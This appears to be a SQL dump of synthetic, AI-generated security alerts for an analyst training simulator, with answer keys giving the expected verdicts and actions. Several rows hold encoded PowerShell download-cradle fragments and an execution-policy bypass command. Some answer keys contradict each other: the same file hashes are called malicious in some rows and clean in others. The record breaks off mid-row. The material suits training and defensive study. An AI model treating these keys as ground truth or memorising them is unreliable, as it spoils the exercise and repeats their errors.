(2203, 'Packed Executable Detected with Reverse Engineering Tools', 'high', 'IDA Pro', 'A packed executable was analyzed, revealing suspicious behavior indicative of malware execution. The executable attempts to persist using startup entries.', 'Malware', 'T1036', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"workstation-01\",\"command_line\":\"C:\\\\Temp\\\\malicious.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with multiple malware families\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Temp\\\\malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable uses process hollowing to evade detection\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable is confirmed malicious due to its behavior and known bad hash.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2204, 'Malicious Macro Execution Detected', 'critical', 'Ghidra', 'A Word document containing a malicious macro was executed. The macro attempted to download additional payloads from a known malicious domain.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.10\",\"username\":\"asmith\",\"hostname\":\"workstation-02\",\"command_line\":\"winword.exe /macro\",\"domain\":\"malicious-domain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain involved in distributing malware\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"winword.exe /macro\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Macro execution attempts to download secondary payloads\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine\"}}],\"expected_actions\":[\"block_domain\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Macro execution from the document led to a connection with a known malicious domain.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2205, 'Suspicious Network Connection During Malware Analysis', 'medium', 'Cuckoo Sandbox', 'A malware sample executed in the sandbox attempted to contact an external IP address known for C2 communications.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"203.0.113.99\",\"username\":\"sandbox_user\",\"hostname\":\"sandbox-machine\",\"file_hash\":\"25f4b8e1b0f94e0a8e7c6a1f9c971e2d\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 communications\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"25f4b8e1b0f94e0a8e7c6a1f9c971e2d\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Sample has few detection flags but is associated with C2 behavior\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address for sandbox environment\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The external IP is known for malicious C2 traffic, confirming the sample\'s malicious nature.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(2206, 'Executable Identified as False Positive in Malware Analysis', 'low', 'Any.Run', 'An executable flagged during the analysis was found to be a legitimate software update mistakenly identified as malicious due to its behavior.', 'Malware', 'T1036', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"username\":\"bsmith\",\"hostname\":\"workstation-03\",\"command_line\":\"C:\\\\Updates\\\\legit_update.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash corresponds to a legitimate software update\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Updates\\\\legit_update.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Executable verified as part of a software update\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The executable, although flagged, was confirmed to be a non-malicious software update.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2207, 'Benign Network Traffic Mistaken for C2 Communication', 'medium', 'Cuckoo Sandbox', 'An internal application generated network traffic that resembled C2 communication, but further analysis revealed it was legitimate.', 'Malware', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.75\",\"dst_ip\":\"203.0.113.150\",\"username\":\"jwilson\",\"hostname\":\"server-01\",\"file_hash\":\"3f5c8f7b9d1c8a2c9f8d6a0e7b0f2d1e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.150\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP occasionally reported, but typically associated with benign traffic\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f5c8f7b9d1c8a2c9f8d6a0e7b0f2d1e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash corresponds to a known internal application\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.75\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address for ICS network\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The traffic was from a legitimate internal application, not a C2 communication.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2208, 'Suspicious Packed Executable Detected in Healthcare Network', 'high', 'IDA Pro', 'A packed executable was detected running on an internal host. Reverse engineering revealed it contains capabilities for persistence.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"host-01\",\"command_line\":\"C:\\\\Windows\\\\Temp\\\\malware.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a healthcare network device\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash reported as malicious by 32 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Windows\\\\Temp\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Executable packed and contains persistence mechanisms\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable is confirmed malicious due to multiple antivirus detections and analysis showing persistence capability.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2209, 'Malicious Macro Execution Attempt Blocked', 'critical', 'Cuckoo Sandbox', 'An email attachment containing a malicious macro was opened on a workstation, triggering execution of a known malicious command.', 'Phishing', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"\",\"username\":\"asmith\",\"hostname\":\"host-02\",\"command_line\":\"powershell.exe -encodedCommand aQBlAG4AdgBvAGsAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"email_sender\":\"malicious@example.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a finance sector workstation\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro file hash identified as malicious by 40 AV engines\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"malicious@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Email address associated with multiple phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"powershell.exe -encodedCommand aQBlAG4AdgBvAGsAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command used for malicious macro execution\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The macro attempted to execute a malicious PowerShell command, validated by the encoded payload analysis.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2210, 'Suspected Malicious Domain Access from Internal Host', 'medium', 'Any.Run', 'An internal host attempted to access a domain known for distributing malware. The domain was flagged by threat intelligence.', 'Malware', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.2.10\",\"dst_ip\":\"198.51.100.50\",\"username\":\"bwhite\",\"hostname\":\"host-03\",\"domain\":\"maliciousdomain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a device within tech infrastructure\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with malware distribution activities\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain flagged for hosting malware payloads\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Access attempt to a known malicious domain suggests potential compromise, requiring containment actions.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2211, 'False Positive: Encoded PowerShell Detected', 'low', 'Ghidra', 'A PowerShell script with encoded content was detected. Analysis revealed it was a legitimate administrative script.', 'Lateral Movement', 'T1077', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.3.15\",\"dst_ip\":\"\",\"username\":\"davis\",\"hostname\":\"host-04\",\"command_line\":\"powershell.exe -encodedCommand aQBlAHgAUwBjAHIAaQBwAHQARQB4AGUAYwB1AHQAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a government machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -encodedCommand aQBlAHgAUwBjAHIAaQBwAHQARQB4AGUAYwB1AHQAZQAgACgAbgBlAHQAIAB3AGMAbgB0ADoA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command verified as legitimate system maintenance script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PowerShell activity was part of routine system maintenance, confirmed via script analysis.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2212, 'False Positive: Misconfigured Internal Web Request', 'medium', 'Cuckoo Sandbox', 'An internal server sent a web request with an unusual payload. Investigation showed it was due to a misconfiguration causing non-malicious traffic.', 'Web Attack', 'T1190', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.5.20\",\"dst_ip\":\"192.168.5.30\",\"username\":\"webservice\",\"hostname\":\"web-server-1\",\"request_body\":\"SELECT * FROM users WHERE user_id = \'1\'\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of an internal web service\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.5.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP address of an internal database server\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"SELECT * FROM users WHERE user_id = \'1\'\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"SQL payload found to be part of a misconfigured service query\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The SQL payload was part of a legitimate query from a misconfigured service, posing no threat.\"}', 'Intermediate', 'MAL', 5, 1, 'OT_ICS', NULL, NULL, NULL, 0),
(2213, 'Packed Executable Detected on Internal Machine', 'high', 'Cuckoo Sandbox', 'A packed executable was detected and analyzed, revealing potential malicious behavior. The executable initiated network connections to a known C2 IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"workstation1\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\suspicious.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Trojan malware\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The packed executable exhibited behavior consistent with malware, connecting to a known C2 server.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2214, 'Malicious Macro in Document Detected', 'critical', 'Any.Run', 'A document containing a malicious macro was detected attempting to execute PowerShell commands on a victim machine.', 'Malware', 'T1203', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"asmith\",\"hostname\":\"laptop-asmith\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\asmith\\\\Downloads\\\\malicious.docm\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the victim machine\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\asmith\\\\Downloads\\\\malicious.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command associated with macro execution of PowerShell\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The document contained a macro that attempted to execute unauthorized commands, indicating an attack attempt.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2215, 'Suspicious Network Activity from Internal Host', 'medium', 'Ghidra', 'An internal host was observed making unusual network connections to an external IP with no known association with business operations.', 'Data Exfiltration', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"198.51.100.7\",\"username\":\"kwhite\",\"hostname\":\"desktop-kwhite\",\"domain\":\"suspicious-domain.com\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.7\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple data exfiltration incidents\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"suspicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain flagged for phishing and data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The network connections to a known malicious domain suggest an attempt to exfiltrate data from the network.\"}', 'Intermediate', 'MAL', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2216, 'False Positive: Legitimate Software Packed as an Executable', 'low', 'IDA Pro', 'A packed executable was detected, but further analysis revealed it to be a legitimate application update.', 'Malware', 'T1055', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"172.16.0.20\",\"username\":\"mjohnson\",\"hostname\":\"tablet-mjohnson\",\"command_line\":\"C:\\\\Program Files\\\\Updater\\\\update.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the device\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"Hash is associated with a clean and legitimate file\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The software was verified as a legitimate application update, causing a false positive alert.\"}', 'Intermediate', 'MAL', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2217, 'False Positive: Script Execution Triggered by Software Update', 'low', 'Any.Run', 'A script execution was flagged as suspicious, but investigation confirmed it was part of a routine software update.', 'Malware', 'T1064', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"10.0.0.8\",\"username\":\"lwilson\",\"hostname\":\"server-lwilson\",\"command_line\":\"/usr/bin/python3 /opt/update_script.py\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the server\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"/usr/bin/python3 /opt/update_script.py\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Script execution is part of legitimate update processes\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The script execution was part of a scheduled update, confirming it as a false positive.\"}', 'Intermediate', 'MAL', 5, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2218, 'Packed Executable Detected via Cuckoo Sandbox Analysis', 'high', 'Cuckoo Sandbox', 'A packed executable was detected during analysis, showing signs of malicious behavior with attempts to contact a known C2 server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:34:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.102\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-5F3H1G\",\"command_line\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\malicious.exe\",\"file_hash\":\"f3a8f8d9c8e9d1a9b1b9c8d7e8f9a1b2\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for command and control activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"f3a8f8d9c8e9d1a9b1b9c8d7e8f9a1b2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with multiple malware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Users\\\\jdoe\\\\Downloads\\\\malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executables in user downloads folder are often malicious\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.1.102\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of victim machine\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The IP address and file hash were identified as involved in malicious activities, confirming a malware infection.\"}', 'Intermediate', 'MAL', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2219, 'Suspicious Macro Activity Detected in Finance Department', 'critical', 'Any.Run', 'A suspicious macro was executed from a document received via email, attempting to download additional payloads.', 'Malware', 'T1204', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:55:27Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.45\",\"dst_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"FINANCE-PC01\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /m\",\"file_hash\":\"c4d9e9f7b8a9d0e8c7b6a5e4f3d2c1b0\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP is linked to malicious macro download activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"c4d9e9f7b8a9d0e8c7b6a5e4f3d2c1b0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Macro hash identified in multiple ransomware cases\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE /m\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Macro execution via WINWORD indicates potential malware delivery\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"192.168.10.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine within the finance department\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Macro execution from an email attachment led to network connections to a known malicious IP, confirming the threat.\"}', 'Intermediate', 'MAL', 5, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2220, 'Potential Malicious Macro Execution - False Positive', 'medium', 'IDA Pro', 'A macro execution was observed in a document; however, further investigation shows it was part of a legitimate update process.', 'Malware', 'T1204', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:45:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"203.0.113.100\",\"username\":\"bwhite\",\"hostname\":\"HR-DEPT-PC\",\"command_line\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE /x\",\"file_hash\":\"a1b2c3d4e5f67890abcdef1234567890\"}', '2026-03-16 03:25:33', '2026-03-16 03:25:33', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"No malicious activity associated with this IP\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f67890abcdef1234567890\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"File hash matches legitimate Microsoft Office update\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\EXCEL.EXE /x\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Excel 